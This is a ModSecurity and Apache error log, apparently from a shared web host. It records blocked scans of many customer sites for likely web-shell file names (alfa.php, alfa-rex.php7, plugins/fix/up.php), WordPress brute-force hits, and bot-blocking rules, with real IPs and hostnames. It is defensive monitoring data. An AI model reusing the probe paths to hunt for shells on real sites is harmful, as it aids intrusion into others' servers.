[Tue May 26 17:34:10.116031 2026] [security2:error] [pid 891273:tid 891281] [remote 121.200.216.55:40194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWMOcDEzZ8z3jtDm82uwgAAcwc"]
[Tue May 26 17:34:10.650820 2026] [security2:error] [pid 894579:tid 894792] [client 20.196.127.68:3800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/222.php"] [unique_id "ahWMOgEtZWuWWBGzl__epAAAAVs"]
[Tue May 26 17:34:10.661616 2026] [security2:error] [pid 894579:tid 894744] [client 66.249.66.199:38877] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "hotsalesretail.com"] [uri "/index.php"] [unique_id "ahWMOAEtZWuWWBGzl__egwAAASw"]
[Tue May 26 17:34:10.992640 2026] [security2:error] [pid 891273:tid 891506] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMOsDEzZ8z3jtDm82uyAAAAGc"]
[Tue May 26 17:34:11.038469 2026] [security2:error] [pid 894579:tid 894837] [client 66.249.70.193:49426] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "abrindoempresa.contabilidadecarioca.com.br"] [uri "/robots.txt"] [unique_id "ahWMOwEtZWuWWBGzl__eqgAAAYg"]
[Tue May 26 17:34:11.258432 2026] [security2:error] [pid 891273:tid 891485] [client 20.196.127.68:7634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/adminfuns.php"] [unique_id "ahWMO8DEzZ8z3jtDm82u1QAAAFI"]
[Tue May 26 17:34:11.422304 2026] [security2:error] [pid 891273:tid 891391] [remote 5.42.158.148:50192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWMO8DEzZ8z3jtDm82u1AAAfXU"]
[Tue May 26 17:34:11.884246 2026] [security2:error] [pid 891273:tid 891517] [client 20.196.127.68:1160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/abcd.php"] [unique_id "ahWMO8DEzZ8z3jtDm82u3wAAAHI"]
[Tue May 26 17:34:13.510051 2026] [security2:error] [pid 891273:tid 891482] [client 20.196.127.68:1198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/al.php"] [unique_id "ahWMPcDEzZ8z3jtDm82u9QAAAE8"]
[Tue May 26 17:34:13.629938 2026] [security2:error] [pid 891273:tid 891423] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMPcDEzZ8z3jtDm82u6gAAABQ"]
[Tue May 26 17:34:14.145480 2026] [security2:error] [pid 894579:tid 894747] [client 20.196.127.68:2149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/alfa.php"] [unique_id "ahWMPgEtZWuWWBGzl__e0gAAAS8"]
[Tue May 26 17:34:14.160846 2026] [core:error] [pid 894579:tid 894825] (104)Connection reset by peer: [client 45.154.98.76:65319] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 17:34:14.828948 2026] [security2:error] [pid 891273:tid 891498] [client 20.196.127.68:7626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/as.php"] [unique_id "ahWMPsDEzZ8z3jtDm82vAQAAAF8"]
[Tue May 26 17:34:15.529041 2026] [security2:error] [pid 894579:tid 894837] [client 20.196.127.68:7644] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/aa.php"] [unique_id "ahWMPwEtZWuWWBGzl__e7AAAAYg"]
[Tue May 26 17:34:15.795566 2026] [security2:error] [pid 894579:tid 894777] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMPwEtZWuWWBGzl__e6QAAAUw"]
[Tue May 26 17:34:16.206216 2026] [security2:error] [pid 891273:tid 891488] [client 20.196.127.68:1188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/abc.php"] [unique_id "ahWMQMDEzZ8z3jtDm82vIQAAAFU"]
[Tue May 26 17:34:16.450242 2026] [core:error] [pid 894579:tid 894713] [client 66.249.66.41:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:34:16.450266 2026] [core:error] [pid 894579:tid 894713] [client 66.249.66.41:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:34:16.795645 2026] [security2:error] [pid 894579:tid 894715] [client 20.196.127.68:15763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/av.php"] [unique_id "ahWMQAEtZWuWWBGzl__e_QAAAQ8"]
[Tue May 26 17:34:17.388558 2026] [security2:error] [pid 891273:tid 891451] [client 20.196.127.68:7658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/autoload_classmap.php"] [unique_id "ahWMQcDEzZ8z3jtDm82vKgAAADA"]
[Tue May 26 17:34:18.030564 2026] [security2:error] [pid 894579:tid 894753] [client 20.196.127.68:2131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/asus.php"] [unique_id "ahWMQgEtZWuWWBGzl__fEgAAATU"]
[Tue May 26 17:34:18.680851 2026] [security2:error] [pid 894579:tid 894712] [client 20.196.127.68:3781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/about.php"] [unique_id "ahWMQgEtZWuWWBGzl__fIAAAAQw"]
[Tue May 26 17:34:18.834301 2026] [security2:error] [pid 894579:tid 894792] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMQgEtZWuWWBGzl__fHQAAAVs"]
[Tue May 26 17:34:19.296768 2026] [security2:error] [pid 894579:tid 894834] [client 20.196.127.68:7652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/atomlib.php"] [unique_id "ahWMQwEtZWuWWBGzl__fKgAAAYU"]
[Tue May 26 17:34:19.638766 2026] [core:error] [pid 891273:tid 891414] (104)Connection reset by peer: [client 45.154.98.76:53070] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 17:34:19.851770 2026] [security2:error] [pid 894579:tid 894804] [client 31.57.184.20:62679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimcorp.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWMQwEtZWuWWBGzl__fQAAAAWc"], referer: https://wordpress.org/
[Tue May 26 17:34:19.935236 2026] [security2:error] [pid 894579:tid 894715] [client 20.196.127.68:3813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/alfa-rex.php7"] [unique_id "ahWMQwEtZWuWWBGzl__fTgAAAQ8"]
[Tue May 26 17:34:20.213970 2026] [security2:error] [pid 891273:tid 891501] [client 31.57.184.20:63015] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimcorp.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWMRMDEzZ8z3jtDm82vTAAAAGI"]
[Tue May 26 17:34:20.477602 2026] [security2:error] [pid 891273:tid 891443] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMRMDEzZ8z3jtDm82vSAAAACg"]
[Tue May 26 17:34:20.619881 2026] [security2:error] [pid 894579:tid 894826] [client 20.196.127.68:9246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/b.php"] [unique_id "ahWMRAEtZWuWWBGzl__fcAAAAX0"]
[Tue May 26 17:34:21.248645 2026] [security2:error] [pid 894579:tid 894816] [client 20.196.127.68:15744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/buy.php"] [unique_id "ahWMRQEtZWuWWBGzl__figAAAXM"]
[Tue May 26 17:34:21.523302 2026] [security2:error] [pid 894579:tid 894831] [client 223.235.98.214:18328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMRQEtZWuWWBGzl__flQAAAYI"]
[Tue May 26 17:34:21.523412 2026] [security2:error] [pid 894579:tid 894831] [client 223.235.98.214:18328] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMRQEtZWuWWBGzl__flQAAAYI"]
[Tue May 26 17:34:21.872369 2026] [security2:error] [pid 894579:tid 894788] [client 20.196.127.68:15806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/bless.php"] [unique_id "ahWMRQEtZWuWWBGzl__fpwAAAVc"]
[Tue May 26 17:34:22.507421 2026] [security2:error] [pid 894579:tid 894764] [client 20.196.127.68:3276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/class-t.api.php"] [unique_id "ahWMRgEtZWuWWBGzl__fvQAAAUA"]
[Tue May 26 17:34:22.993866 2026] [autoindex:error] [pid 891273:tid 891423] [client 152.59.39.17:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 17:34:23.163179 2026] [security2:error] [pid 894579:tid 894740] [client 20.196.127.68:15804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/cache.php"] [unique_id "ahWMRwEtZWuWWBGzl__f2wAAASg"]
[Tue May 26 17:34:23.584194 2026] [security2:error] [pid 894579:tid 894776] [client 152.59.39.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWMRwEtZWuWWBGzl__f8wAAAUs"], referer: https://www.ucdc.co.in/
[Tue May 26 17:34:23.610677 2026] [security2:error] [pid 894579:tid 894772] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMRwEtZWuWWBGzl__f3gAAAUc"]
[Tue May 26 17:34:23.787235 2026] [security2:error] [pid 891273:tid 891416] [client 20.196.127.68:9220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/content.php"] [unique_id "ahWMR8DEzZ8z3jtDm82vrAAAAA0"]
[Tue May 26 17:34:24.373889 2026] [security2:error] [pid 894579:tid 894785] [client 20.196.127.68:2115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/classwithtostring.php"] [unique_id "ahWMSAEtZWuWWBGzl__gFQAAAVQ"]
[Tue May 26 17:34:24.987786 2026] [security2:error] [pid 894579:tid 894825] [client 20.196.127.68:1201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/css.php"] [unique_id "ahWMSAEtZWuWWBGzl__gKQAAAXw"]
[Tue May 26 17:34:25.119469 2026] [core:error] [pid 891273:tid 891448] (104)Connection reset by peer: [client 45.154.98.76:52578] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 17:34:25.608980 2026] [security2:error] [pid 894579:tid 894715] [client 20.196.127.68:3799] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/chosen.php"] [unique_id "ahWMSQEtZWuWWBGzl__gRgAAAQ8"]
[Tue May 26 17:34:25.631557 2026] [security2:error] [pid 891273:tid 891479] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMScDEzZ8z3jtDm82vxwAAAEw"]
[Tue May 26 17:34:26.248406 2026] [security2:error] [pid 891273:tid 891439] [client 20.196.127.68:3289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/doc.php"] [unique_id "ahWMSsDEzZ8z3jtDm82v2AAAACQ"]
[Tue May 26 17:34:26.861053 2026] [security2:error] [pid 894579:tid 894759] [client 20.196.127.68:7616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/elp.php"] [unique_id "ahWMSgEtZWuWWBGzl__gbwAAATs"]
[Tue May 26 17:34:27.088965 2026] [security2:error] [pid 894579:tid 894727] [client 185.191.171.9:18344] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-21st/day/2024-02-29/"] [unique_id "ahWMSwEtZWuWWBGzl__gdgAAARs"]
[Tue May 26 17:34:27.089079 2026] [security2:error] [pid 894579:tid 894727] [client 185.191.171.9:18344] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-21st/day/2024-02-29/"] [unique_id "ahWMSwEtZWuWWBGzl__gdgAAARs"]
[Tue May 26 17:34:27.557282 2026] [security2:error] [pid 894579:tid 894755] [client 20.196.127.68:15750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/Exception-class.php"] [unique_id "ahWMSwEtZWuWWBGzl__ghwAAATc"]
[Tue May 26 17:34:27.981478 2026] [security2:error] [pid 891273:tid 891519] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMS8DEzZ8z3jtDm82v_gAAAHQ"]
[Tue May 26 17:34:28.184980 2026] [security2:error] [pid 894579:tid 894766] [client 20.196.127.68:3323] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/ee.php"] [unique_id "ahWMTAEtZWuWWBGzl__gnwAAAUI"]
[Tue May 26 17:34:28.804420 2026] [security2:error] [pid 894579:tid 894709] [client 20.196.127.68:15779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/edit.php"] [unique_id "ahWMTAEtZWuWWBGzl__guAAAAQo"]
[Tue May 26 17:34:29.448766 2026] [security2:error] [pid 894579:tid 894767] [client 20.196.127.68:3810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/f35.php"] [unique_id "ahWMTQEtZWuWWBGzl__g1AAAAUM"]
[Tue May 26 17:34:30.019233 2026] [security2:error] [pid 891273:tid 891360] [remote 94.76.235.103:60716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWMTcDEzZ8z3jtDm82wLAAAFFY"]
[Tue May 26 17:34:30.091153 2026] [security2:error] [pid 891273:tid 891415] [client 20.196.127.68:1208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/fff.php"] [unique_id "ahWMTsDEzZ8z3jtDm82wMgAAAAw"]
[Tue May 26 17:34:30.701403 2026] [security2:error] [pid 891273:tid 891407] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMTsDEzZ8z3jtDm82wPwAAAAQ"]
[Tue May 26 17:34:30.757581 2026] [security2:error] [pid 894579:tid 894711] [client 20.196.127.68:1170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/ff1.php"] [unique_id "ahWMTgEtZWuWWBGzl__g9wAAAQs"]
[Tue May 26 17:34:31.401455 2026] [security2:error] [pid 894579:tid 894728] [client 20.196.127.68:3838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/flower.php"] [unique_id "ahWMTwEtZWuWWBGzl__g_gAAARw"]
[Tue May 26 17:34:31.638315 2026] [security2:error] [pid 891273:tid 891504] [client 45.154.98.150:63926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-plain.php"] [unique_id "ahWMT8DEzZ8z3jtDm82wYgAAAGU"], referer: www.google.com
[Tue May 26 17:34:31.673030 2026] [security2:error] [pid 891273:tid 891443] [client 45.154.98.150:62691] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWMT8DEzZ8z3jtDm82wZgAAACg"], referer: www.google.com
[Tue May 26 17:34:31.704394 2026] [security2:error] [pid 891273:tid 891454] [client 45.154.98.150:62690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWMT8DEzZ8z3jtDm82wZQAAADM"]
[Tue May 26 17:34:32.003235 2026] [security2:error] [pid 891273:tid 891511] [client 20.196.127.68:7631] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/file.php"] [unique_id "ahWMUMDEzZ8z3jtDm82wgAAAAGw"]
